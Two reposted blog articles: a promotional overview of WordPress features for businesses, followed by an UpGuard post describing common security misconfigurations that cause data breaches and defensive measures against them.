1. Open-Source Platform With a Large Community
One of the most appealing aspects of WordPress is that it’s an open-source platform, meaning you have the freedom to customize and modify your website as you see fit. This also means that there is a large community of developers continually contributing to its improvement. You’re never alone when you have a problem; chances are someone else has faced the same issue and found a solution that they’ve shared.

2. High Level of Customization and Scalability
WordPress offers an almost limitless array of customization options. With thousands of themes and plugins available, you can tailor the appearance and functionality of your website to perfectly match your brand and business objectives. This high degree of customization extends to supporting different currencies, enabling you to appeal to an international customer base effortlessly.

3. User-Friendly Interface
WordPress is designed to be used by people who may not have any coding experience. The platform is intuitive, making it easy to add content, make updates, and manage various aspects of your site without needing specialized technical knowledge.

4. SEO Capabilities
Search engine optimization (SEO) is critical for any business aiming for long-term success. WordPress is coded to be SEO-friendly right out of the box. Additionally, there are several SEO plugins available that can help you optimize your content and improve your rankings further.

5. Cost-Effective
Starting a website with WordPress can be incredibly cost-efficient. The platform itself is free, and many high-quality themes and plugins are available at no cost. While there may be some expenses, such as for specialized plugins or a more premium hosting service, these costs are generally lower compared to developing a custom website from scratch.

6. eCommerce Ready
For businesses looking to sell products or services online, WordPress seamlessly integrates with eCommerce solutions like WooCommerce. This allows for easy inventory management, payment gateway integration, and functionalities like printing shipping labels directly from your dashboard.

By choosing WordPress as your business platform, you’re not just creating a website—you’re building a scalable, customizable, and efficient business operation that can grow with you. With its blend of user-friendly design, SEO capabilities, and versatile functionality, WordPress proves to be a strong ally in achieving your business goals. Keep reading as we delve into these aspects in greater detail, starting with the platform’s unmatched flexibility and customization options.

Flexibility and Customization

One of the most significant advantages of using WordPress is its unparalleled flexibility and customization options. Whether you’re in the healthcare sector, the food and beverage industry, or running an eCommerce store, WordPress has you covered. With its array of specialized themes and plugins tailored to business needs, you can establish a strong online presence that aligns with your brand and business goals.

Themes

Themes offer the first layer of customization. Designed specifically for various business sectors, they provide built-in functionalities like portfolios, customer testimonials, and eCommerce features. You can establish your visual brand identity effortlessly, without writing a single line of code.

Plugins

Moving on to plugins, they are the true workhorses of WordPress customization. WordPress has tens of thousands of plugins in its directory, and these handy additions can install virtually any functionality you can imagine. Whether you need an appointment booking system, a members-only section, or automated marketing solutions, there’s a plugin for that. Some plugins even allow you to handle multiple currencies, making your website more accommodating for international customers.

By combining the right themes and plugins, WordPress allows you unparalleled control over how your website looks and functions. This isn’t just advantageous for you as the business owner; it also dramatically enhances the user experience. Your customers can interact with a platform that is both visually appealing and highly functional, meeting their needs no matter where they are in the world or what currency they prefer to use.

Security

Having a secure website is a non-negotiable for businesses. Luckily, WordPress takes security seriously and offers a multitude of features to help you protect your online assets. For starters, the platform releases regular updates to address known security vulnerabilities, ensuring that you are always running the most secure version possible.

Change reporting is another powerful feature provided by WordPress security plugins, allowing you to monitor real-time changes on your site. Any unauthorized modifications can trigger alerts, enabling you to take quick action. Additionally, many plugins offer malware scanning, which continuously scans your site’s files to detect malicious code and potential threats.

Intrusion prevention mechanisms are also commonly found in WordPress security solutions. These tools can block suspicious IP addresses, limit login attempts, and even implement two-factor authentication to add an extra layer of protection to your site.

While no system can guarantee 100% security, WordPress comes close by offering a range of robust features that work together to minimize risks. By taking advantage of these tools, you’re not just protecting your website; you’re safeguarding your business reputation and the trust of your customers. However, it’s crucial to remember that users also bear the responsibility for keeping themes and plugins updated, as outdated software can pose security risks.

SEO Capabilities

Visibility is crucial for any online business, and WordPress shines when it comes to search engine optimization (SEO). The platform is designed with built-in SEO features that allow for custom permalinks, meta descriptions, and image alt text, making it easier for search engines to read and index your site.

Additionally, SEO plugins like Yoast and All in One SEO can further enhance your optimization efforts. These plugins help you target specific keywords and improve content readability. Site speed, an important SEO factor, can be optimized by choosing a quality hosting service like HostDash.

WordPress themes are also generally responsive, adapting to various screen sizes, which is vital for mobile optimization—a significant factor in search rankings. Analytics plugins offer insights into your site’s performance, and local SEO can be easily managed for businesses operating in specific geographic locations.

Whether you want to target a global or local audience, WordPress has the tools and setup to help you achieve your specific SEO goals. By leveraging WordPress’s SEO features, you set the stage for better visibility, increased customer engagement, and, ultimately, business growth.

eCommerce Solutions

In today’s digital age, having an eCommerce capability is often essential for business growth. WordPress makes this transition smooth and simple. Through its seamless integration with WooCommerce and other eCommerce plugins, WordPress allows businesses to set up an online store effortlessly.

WooCommerce Integration

WooCommerce is the go-to eCommerce plugin for WordPress users, enabling a wide range of functionalities, from inventory management to payment gateway integration. The setup is straightforward, allowing even those with minimal technical expertise to launch an online store.

Payment and Currency Flexibility

One of the benefits of using WordPress for eCommerce is the range of payment options available. Whether your customers prefer credit card payments, PayPal, or digital wallets, WordPress has you covered. Some plugins even support transactions in multiple currencies, which is ideal for businesses looking to serve an international clientele.

Shipping Solutions

Shipping is a critical component of any eCommerce operation. WordPress simplifies this aspect as well, with options for calculating real-time shipping costs and even printing shipping labels directly from your dashboard.

Content Management

Managing content effectively is at the heart of any successful online business. WordPress makes this task simple and intuitive. Built originally as a blogging platform, WordPress has advanced content management capabilities that extend far beyond just text-based posts. It supports a wide range of media types, including images, videos, and audio files, allowing you to create a rich, multimedia experience for your visitors.

One of the standout features is the built-in editor, which provides a user-friendly interface for creating and formatting your content. This editor allows for real-time previews so you can see how changes will look before they go live. Beyond the visual aspects, WordPress enables easy content organization through categories, tags, and custom taxonomies. You can also schedule posts in advance, freeing you from having to manually update content and allowing you to focus on other aspects of your business.

Even more appealing is how WordPress content management intersects with other functionalities. You can easily link blog posts to specific products in your online store or incorporate SEO best practices directly into your content using plugins. All these features work in tandem to make your site not just a promotional tool, but a comprehensive platform for customer engagement and business growth.

Scalability

As your business grows, you need a platform that can grow with you, and WordPress excels in this aspect. The platform allows you to scale up or down easily based on your business needs. Whether you’re adding new products, launching a subscription service, or expanding into new markets, WordPress remains stable and functional. Furthermore, it’s essential to choose a hosting plan that can adapt as you grow. The right host will offer various server resources and hosting plans that can be modified to meet your increasing requirements, ensuring that scaling up doesn’t become a bottleneck for your business.

Analytics and Reporting

Data is vital in understanding how your business is performing, and WordPress allows for seamless integration with analytics tools like Google Analytics. With just a few clicks, you can have access to a wealth of information ranging from visitor demographics to behavior patterns. WordPress also offers plugins that can help you monitor key performance indicators (KPIs). By keeping an eye on these metrics, you can gain valuable insights into customer behavior, which in turn can inform your business strategies and help you make data-driven decisions.

Conclusion

In sum, WordPress isn’t just a platform for bloggers; it’s a comprehensive tool for businesses of all sizes. Its open-source nature, scalability, and a vast array of customization options make it a compelling choice for entrepreneurs looking to build an online presence without breaking the bank. With robust security measures, SEO capabilities, and integrated eCommerce solutions, WordPress offers a well-rounded package that can adapt to your evolving business needs.

Whether you’re looking to attract a global audience, keep your site secure, or gain valuable insights through analytics, WordPress provides the tools you need to not just survive, but thrive in the competitive digital landscape.

Source :
https://getshieldsecurity.com/blog/how-wordpress-can-help-scale-your-business/

Top 5 Security Misconfigurations Causing Data Breaches in 2023

Edward Kost
updated May 15, 2023

Security misconfigurations are a common and significant cybersecurity issue that can leave businesses vulnerable to data breaches. According to the latest data breach investigation report by IBM and the Ponemon Institute, the average cost of a breach has peaked at US$4.35 million. Many data breaches are caused by avoidable errors like security misconfiguration. By following the tips in this article, you could identify and address a security error that could save you millions of dollars in damages.

Learn how UpGuard can help you detect data breach risks >

What is a Security Misconfiguration?

A security misconfiguration occurs when a system, application, or network device’s settings are not correctly configured, leaving it exposed to potential cyber threats. This could be due to default configurations left unchanged, unnecessary features enabled, or permissions set too broadly. Hackers often exploit these misconfigurations to gain unauthorized access to sensitive data, launch malware attacks, or carry out phishing attacks, among other malicious activities.

What Causes Security Misconfigurations?

Security misconfigurations can result from various factors, including human error, lack of awareness, and insufficient security measures. For instance, employees might configure systems without a thorough understanding of security best practices, security teams might overlook crucial security updates due to the growing complexity of cloud services and infrastructures.

Additionally, the rapid shift to remote work during the pandemic has increased the attack surface for cybercriminals, making it more challenging for security teams to manage and monitor potential vulnerabilities.

List of Common Types of Security Configurations Facilitating Data Breaches

Some common types of security misconfigurations include:

1. Default Settings

With the rise of cloud solutions such as Amazon Web Services (AWS) and Microsoft Azure, companies increasingly rely on these platforms to store and manage their data. However, using cloud services also introduces new security risks, such as the potential for misconfigured settings or unauthorized access.

A prominent example of insecure default software settings that could have facilitated a significant breach is the Microsoft Power Apps data leak incident of 2021. By default, Power Apps portal data feeds were set to be accessible to the public.

Unless developers specified for OData feeds to be set to private, virtually anyone could access the backend databases of applications built with Power Apps. UpGuard researchers located the exposure and notified Microsoft, who promptly addressed the leak. UpGuard’s detection helped Microsoft avoid a large-scale breach that could have potentially compromised 38 million records.

Read this whitepaper to learn how to prevent data breaches >

2. Unnecessary Features

Enabling features or services not required for a system’s operation can increase its attack surface, making it more vulnerable to threats. Some examples of unnecessary product features include remote administration tools, file-sharing services, and unused network ports. To mitigate data breach risks, organizations should conduct regular reviews of their systems and applications to identify and disable or remove features that are not necessary for their operations.

Additionally, organizations should practice the principle of least functionality, ensuring that systems are deployed with only the minimal set of features and services required for their specific use case.

3. Insecure Permissions

Overly permissive access controls can allow unauthorized users to access sensitive data or perform malicious actions. To address this issue, organizations should implement the principle of least privilege, granting users the minimum level of access necessary to perform their job functions. This can be achieved through proper role-based access control (RBAC) configurations and regular audits of user privileges. Additionally, organizations should ensure that sensitive data is appropriately encrypted both in transit and at rest, further reducing the risk of unauthorized access.

4. Outdated Software

Failing to apply security patches and updates can expose systems to known vulnerabilities. To protect against data breaches resulting from outdated software, organizations should have a robust patch management program in place. This includes regularly monitoring for available patches and updates, prioritizing their deployment based on the severity of the vulnerabilities being addressed, and verifying the successful installation of these patches.

Additionally, organizations should consider implementing automated patch management solutions and vulnerability scanning tools to streamline the patching process and minimize the risk of human error.

5. Insecure API Configurations

APIs that are not adequately secured can allow threat actors to access sensitive information or manipulate systems. API misconfigurations – like the one that led to T-Mobile’s 2023 data breach, are becoming more common. As more companies move their services to the cloud, securing these APIs and preventing the data leaks they facilitate is becoming a bigger challenge.

To mitigate the risks associated with insecure API configurations, organizations should implement strong authentication and authorization mechanisms, such as OAuth 2.0 or API keys, to ensure only authorized clients can access their APIs. Additionally, organizations should conduct regular security assessments and penetration testing to identify and remediate potential vulnerabilities in their API configurations.

Finally, adopting a secure software development lifecycle (SSDLC) and employing API security best practices, such as rate limiting and input validation, can help prevent data breaches stemming from insecure APIs.

Learn how UpGuard protects against third-party breaches >

How to Avoid Security Misconfigurations Impacting Your Data Breach Resilience

To protect against security misconfigurations, organizations should:

1. Implement a Comprehensive Security Policy

Implement a cybersecurity policy covering all system and application configuration aspects, including guidelines for setting permissions, enabling features, and updating software.

2. Implement a Cyber Threat Awareness Program

An essential security measure that should accompany the remediation of security misconfigurations is employee threat awareness training. Of those who recently suffered cloud security breaches, 55% of respondents identified human error as the primary cause.

With your employees equipped to correctly respond to common cybercrime tactics that preceded data breaches, such as social engineering attacks and social media phishing attacks, your business could avoid a security incident should threat actors find and exploit an overlooked security misconfiguration.

Phishing attacks involve tricking individuals into revealing sensitive information that could be used to compromise an account or facilitate a data breach. During these attacks, threat actors target account login credentials, credit card numbers, and even phone numbers to exploit Multi-Factor authentication.

Learn the common ways MFA can be exploited >

Phishing attacks are becoming increasingly sophisticated, with cybercriminals using automation and other tools to target large numbers of individuals. 

Here’s an example of a phishing campaign where a hacker has built a fake login page to steal a customer’s banking credentials. As you can see, the fake login page looks almost identical to the actual page, and an unsuspecting eye will not notice anything suspicious.

Real Commonwealth Bank Login Page
Real Commonwealth Bank Login Page.
Fake Commonwealth Bank Login Page
Fake Commonwealth Bank Login Page

Because this poor cybersecurity habit is common amongst the general population, phishing campaigns could involve fake login pages for social media websites, such as LinkedIn, popular websites like Amazon, and even SaaS products. Hackers implementing such tactics hope the same credentials are used for logging into banking websites.

Cyber threat awareness training is the best defense against phishing, the most common attack vector leading to data breaches and ransomware attacks.

Because small businesses often lack the resources and expertise of larger companies, they usually don’t have the budget for additional security programs like awareness training. This is why, according to a recent report, 61% of small and medium-sized businesses experienced at least one cyber attack in the past year, and 40% experienced eight or more attacks.

Luckily, with the help of ChatGPT, small businesses can implement an internal threat awareness program at a fraction of the cost. Industries at a heightened risk of suffering a data breach, such as healthcare, should especially prioritize awareness of the cyber threat landscape.

Learn how to implement an internal cyber threat awareness campaign >

3. Use Multi-Factor Authentication

MFA and strong access management control to limit unauthorized access to sensitive systems and data.

Previously compromised passwords are often used to hack into accounts. MFA adds additional authentication protocols to the login process, making it difficult to compromise an account, even if hackers get their hands on a stolen password

4. Use Strong Access Management Controls

Identity and Access Management (IAM) systems ensure users only have access to the data and applications they need to do their jobs and that permissions are revoked when an employee leaves the company or changes roles.

The 2023 Thales Dara Threat Report found that 28% of respondents found IAM to be the most effective data security control preventing personal data compromise.

5. Keep All Software Patched and Updated

Keep all environments up-to-date by promptly applying patches and updates. Consider patching a “golden image” and deploying it across your environment. Perform regular scans and audits to identify potential security misconfigurations and missing patches.

An attack surface monitoring solution, such as UpGuard, can detect vulnerable software versions that have been impacted by zero-days and other known security flaws.

6. Deploy Security Tools

Security tools, such as intrusion detection and prevention systems (IDPS) and security information and event management (SIEM) solutions, to monitor and respond to potential threats.

It’s essential also to implement tools to defend against tactics often used to complement data breach attempts, for example. DDoS attacks – a type of attack where a server is flooded with fake traffic to force it offline, allowing hackers to exploit security misconfigurations during the chaos of excessive downtime.

Another important security tool is a data leak detection solution for discovering compromised account credentials published on the dark web. These credentials, if exploited, allow hackers to compress the data breach lifecycle, making these events harder to detect and intercept.

Dara leaks compressing the data breach lifecycle.

Learn how to detect and prevent data leaks >

7. Implement a Zero-Trust Architecture

One of the main ways that companies can protect themselves from cloud-related security threats is by implementing a Zero Trust security architecture. This approach assumes all requests for access to resources are potentially malicious and, therefore, require additional verification before granting access.

Learn how to implement a Zero-Trust Architecture >

A Zero-Trust approach to security assumes that all users, devices, and networks are untrustworthy until proven otherwise.

8. Develop a Repeatable Hardening Process

Establish a process that can be easily replicated to ensure consistent, secure configurations across production, development, and QA environments. Use different passwords for each environment and automate the process for efficient deployment. Be sure to address IoT devices in the hardening process. 

These devices tend to be secured with their default factory passwords, making them highly vulnerable to DDoS attacks.

9. Implement a Secure Application Architecture

Design your application architecture to obfuscate general access to sensitive resources using the principle of network segmentation.

Learn more about network segmentation >

Cloud infrastructure has become a significant cybersecurity issue in the last decade. Barely a month goes by without a major security breach at a cloud service provider or a large corporation using cloud services.

10. Maintain a Structured Development Cycle

Facilitate security testing during development by adhering to a well-organized development process. Following cybersecurity best practices this early in the development process sets the foundation for a resilient security posture that will protect your data even as your company scales.

Implement a secure software development lifecycle (SSDLC) that incorporates security checkpoints at each stage of development, including requirements gathering, design, implementation, testing, and deployment. Additionally, train your development team in secure coding practices and encourage a culture of security awareness to help identify and remediate potential vulnerabilities before they make their way into production environments.

11. Review Custom Code

If using custom code, employ a static code security scanner before integrating it into the production environment. These scanners can automatically analyze code for potential vulnerabilities and compliance issues, reducing the risk of security misconfigurations.

Additionally, have security professionals conduct manual reviews and dynamic testing to identify issues that may not be detected by automated tools. This combination of automated and manual testing ensures that custom code is thoroughly vetted for security risks before deployment.

12. Utilize a Minimal Platform

Remove unused features, insecure frameworks, and unnecessary documentation, samples, or components from your platform. Adopt a “lean” approach to your software stack by only including components that are essential for your application’s functionality.

This reduces the attack surface and minimizes the chances of security misconfigurations. Furthermore, keep an inventory of all components and their associated security risks to better manage and mitigate potential vulnerabilities.

13. Review Cloud Storage Permissions

Regularly examine permissions for cloud storage, such as S3 buckets, and incorporate security configuration updates and reviews into your patch management process. This process should be a standard inclusion across all cloud security measures. Ensure that access controls are properly configured to follow the principle of least privilege, and encrypt sensitive data both in transit and at rest.

Implement monitoring and alerting mechanisms to detect unauthorized access or changes to your cloud storage configurations. By regularly reviewing and updating your cloud storage permissions, you can proactively identify and address potential security misconfigurations, thereby enhancing your organization’s data breach resilience.

How UpGuard Can Help

UpGuard’s IP monitoring feature monitors all IP addresses associated with your attack surface for security issues, misconfigurations, and vulnerabilities. UpGuard’s attack surface monitoring solution can also identify common misconfigurations and security issues shared across your organization and its subsidiaries, including the exposure of WordPress user names, vulnerable server versions, and a range of attack vectors facilitating first and third data breaches.

UpGuard's Risk Profile feature displays security vulnerabilities associated with end-of-life software.
UpGuard’s Risk Profile feature displays security vulnerabilities associated with end-of-life software.

To further expand its mitigation of data breach threat categories, UpGuard offersa data leak detection solution that scans ransomware blogs on the dark web for compromised credentials, and any leaked data could help hackers breach your network and sensitive resources.

UpGuard's ransomware blog detection feature.
UpGuard’s ransomware blog detection feature.

Source :
https://www.upguard.com/blog/security-misconfigurations-causing-data-breaches